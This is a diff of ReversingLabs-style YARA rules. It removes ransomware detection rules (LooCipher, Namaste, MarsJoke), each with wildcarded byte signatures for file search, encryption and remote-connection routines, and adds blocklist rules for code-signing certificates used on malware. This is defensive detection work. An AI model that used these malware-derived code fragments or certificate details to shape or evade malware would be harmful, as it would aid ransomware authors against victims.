-            ?? 3B C6 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83
-            7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ??
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 66 89 44 24 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24
-        }
-		$encrypt_file_2 = {
-            C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 66 89 44
-            24 ?? 8D B4 24 ?? ?? ?? ?? 0F 43 BC 24 ?? ?? ?? ?? 8D 44 24 ?? 83 BC 24 ?? ?? ?? ??
-            ?? 50 0F 43 B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 57 56 8B 00 FF D0 85 C0 68 ?? ?? ?? ?? 0F 95 C3 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ??
-            8D 44 24 ?? 8D B4 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 43 B4 24 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 56 8B 00 FF D0 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6
-            84 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 83 EC ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B 58 ?? 03 18 E8 ?? ?? ??
-            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 33 C9 8B 00 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B F8 8D 4C 24 ?? 57 BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 4C 24 ?? 8B 41 ?? F6 84 04 ?? ?? ?? ?? ?? 74 ?? 8D 4C 24 ?? BA ?? ?? ?? ??
-            03 C8 8B F3 33 C0 39 41 ?? 0F 44 C2 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ??
-            ?? ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 56 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F3 0F 6F 00 F3 0F 7F 07 E8 ?? ?? ?? ?? F3 0F 6F
-        }
-		$encrypt_file_3 = {
-            00 F3 0F 7F 47 ?? F3 0F 6F 40 ?? F3 0F 7F 47 ?? F3 0F 6F 40 ?? 8D 84 24 ?? ?? ?? ??
-            50 51 F3 0F 7F 47 ?? 57 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4
-            ?? 85 F6 74 ?? 6A ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B4 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 75 ?? 8B 44 24 ?? 8D 4C 24 ?? 8B 40 ?? 03 C8 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75
-            ?? 83 C8 ?? 83 E0 ?? 89 41 ?? 85 41 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 85 F6 74 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B3 ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? C6 84 24 ??
-            ?? ?? ?? ?? 50 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 32 DB
-            C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF
-            B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ??
-            ?? 83 BC 24 ?? ?? ?? ?? ?? 72 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ?? 8A C3 C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ??
-            ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $encrypt_file_3
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OF.PL sp. z o.o." and pe.signatures [ i ] . serial == "3d:5e:71" and 1066997730 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LooCipher ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12762-L12780"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3"
+		logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LooCipher"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
-            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D
-            45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74
-            ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89
-            55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ??
-            E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89
-            A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC
-            89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SELCUK GUNDOGDU" and ( pe.signatures [ i ] . serial == "00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures [ i ] . serial == "c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" ) and 1426204800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Namaste ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "546692ed-2506-56ad-b678-e74b857380a3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12782-L12798"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e"
+		logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Namaste"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32
-            ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ??
-            ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files_p2 = {
-            02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ??
-            0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ??
-            2A 08 2A
-        }
-		$encrypt_files_p1 = {
-            02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A
-        }
-		$encrypt_files_p2 = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ??
-            ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
-            ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07
-            28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files_p3 = {
-            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06
-            6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ??
-            ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ??
-            ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11
-            ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09
-            2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "World Telecom International Inc." and pe.signatures [ i ] . serial == "6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MarsJoke ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8164c586-f548-5414-9df8-61e0c51cbe29"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "12664460-19e1-5b73-8299-cfe19dffc0b4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12800-L12816"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c"
+		logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MarsJoke"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
-            ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44
-            24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84
